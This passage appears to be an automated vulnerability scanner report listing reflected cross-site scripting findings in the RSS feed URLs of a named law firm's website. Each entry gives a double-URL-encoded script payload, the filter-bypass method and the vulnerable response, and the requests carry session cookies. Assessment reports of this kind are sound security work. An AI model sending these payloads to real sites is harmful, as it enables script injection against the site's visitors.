<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Insurance/rss.xmldc903"><script>alert(1)</script>8c3f9de4a75" value="">
...[SNIP]...

4.267. http://www.wileyrein.com/rss/practices/Intellectual_Property/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Intellectual_Property/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8cc0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97bf63e9708 was submitted in the REST URL parameter 1. This input was echoed as a8cc0"><script>alert(1)</script>97bf63e9708 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssa8cc0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97bf63e9708/practices/Intellectual_Property/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssa8cc0"><script>alert(1)</script>97bf63e9708/practices/Intellectual_Property/rss.xml" value="">
...[SNIP]...

4.268. http://www.wileyrein.com/rss/practices/Intellectual_Property/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Intellectual_Property/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebee6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cb5eed4035 was submitted in the REST URL parameter 2. This input was echoed as ebee6"><script>alert(1)</script>8cb5eed4035 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicesebee6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cb5eed4035/Intellectual_Property/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicesebee6"><script>alert(1)</script>8cb5eed4035/Intellectual_Property/rss.xml" value="">
...[SNIP]...

4.269. http://www.wileyrein.com/rss/practices/Intellectual_Property/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Intellectual_Property/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a6c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef1282db072c was submitted in the REST URL parameter 3. This input was echoed as 9a6c9"><script>alert(1)</script>f1282db072c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Intellectual_Property9a6c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef1282db072c/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Intellectual_Property9a6c9"><script>alert(1)</script>f1282db072c/rss.xml" value="">
...[SNIP]...

4.270. http://www.wileyrein.com/rss/practices/Intellectual_Property/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Intellectual_Property/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7748%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1dd7e1a93aa was submitted in the REST URL parameter 4. This input was echoed as f7748"><script>alert(1)</script>1dd7e1a93aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Intellectual_Property/rss.xmlf7748%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1dd7e1a93aa HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Intellectual_Property/rss.xmlf7748"><script>alert(1)</script>1dd7e1a93aa" value="">
...[SNIP]...

4.271. http://www.wileyrein.com/rss/practices/International_Trade/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/International_Trade/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d092e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1334ddb4b76 was submitted in the REST URL parameter 1. This input was echoed as d092e"><script>alert(1)</script>1334ddb4b76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssd092e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1334ddb4b76/practices/International_Trade/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssd092e"><script>alert(1)</script>1334ddb4b76/practices/International_Trade/rss.xml" value="">
...[SNIP]...

4.272. http://www.wileyrein.com/rss/practices/International_Trade/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/International_Trade/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d46e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef30c22f14ce was submitted in the REST URL parameter 2. This input was echoed as d46e9"><script>alert(1)</script>f30c22f14ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicesd46e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef30c22f14ce/International_Trade/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicesd46e9"><script>alert(1)</script>f30c22f14ce/International_Trade/rss.xml" value="">
...[SNIP]...

4.273. http://www.wileyrein.com/rss/practices/International_Trade/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/International_Trade/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fca14%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea76b08aeebe was submitted in the REST URL parameter 3. This input was echoed as fca14"><script>alert(1)</script>a76b08aeebe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/International_Tradefca14%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea76b08aeebe/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/International_Tradefca14"><script>alert(1)</script>a76b08aeebe/rss.xml" value="">
...[SNIP]...

4.274. http://www.wileyrein.com/rss/practices/International_Trade/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/International_Trade/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb24c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6e42435c0a7 was submitted in the REST URL parameter 4. This input was echoed as eb24c"><script>alert(1)</script>6e42435c0a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/International_Trade/rss.xmleb24c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6e42435c0a7 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/International_Trade/rss.xmleb24c"><script>alert(1)</script>6e42435c0a7" value="">
...[SNIP]...

4.275. http://www.wileyrein.com/rss/practices/Litigation/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Litigation/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cd05%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4aa15667da1 was submitted in the REST URL parameter 1. This input was echoed as 2cd05"><script>alert(1)</script>4aa15667da1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss2cd05%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4aa15667da1/practices/Litigation/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss2cd05"><script>alert(1)</script>4aa15667da1/practices/Litigation/rss.xml" value="">
...[SNIP]...

4.276. http://www.wileyrein.com/rss/practices/Litigation/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Litigation/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c84a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed9dfe2363ba was submitted in the REST URL parameter 2. This input was echoed as 2c84a"><script>alert(1)</script>d9dfe2363ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices2c84a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed9dfe2363ba/Litigation/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices2c84a"><script>alert(1)</script>d9dfe2363ba/Litigation/rss.xml" value="">
...[SNIP]...

4.277. http://www.wileyrein.com/rss/practices/Litigation/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Litigation/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 191ff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e238461b7a86 was submitted in the REST URL parameter 3. This input was echoed as 191ff"><script>alert(1)</script>238461b7a86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Litigation191ff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e238461b7a86/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Litigation191ff"><script>alert(1)</script>238461b7a86/rss.xml" value="">
...[SNIP]...

4.278. http://www.wileyrein.com/rss/practices/Litigation/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Litigation/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14505%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e478d1333f6d was submitted in the REST URL parameter 4. This input was echoed as 14505"><script>alert(1)</script>478d1333f6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Litigation/rss.xml14505%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e478d1333f6d HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Litigation/rss.xml14505"><script>alert(1)</script>478d1333f6d" value="">
...[SNIP]...

4.279. http://www.wileyrein.com/rss/practices/Postal/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Postal/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc84f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e79d0e014d42 was submitted in the REST URL parameter 1. This input was echoed as dc84f"><script>alert(1)</script>79d0e014d42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssdc84f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e79d0e014d42/practices/Postal/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssdc84f"><script>alert(1)</script>79d0e014d42/practices/Postal/rss.xml" value="">
...[SNIP]...

4.280. http://www.wileyrein.com/rss/practices/Postal/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Postal/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a669%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6384682ca38 was submitted in the REST URL parameter 2. This input was echoed as 4a669"><script>alert(1)</script>6384682ca38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices4a669%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6384682ca38/Postal/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices4a669"><script>alert(1)</script>6384682ca38/Postal/rss.xml" value="">
...[SNIP]...

4.281. http://www.wileyrein.com/rss/practices/Postal/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Postal/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6c53%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2206f6e398b was submitted in the REST URL parameter 3. This input was echoed as e6c53"><script>alert(1)</script>2206f6e398b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

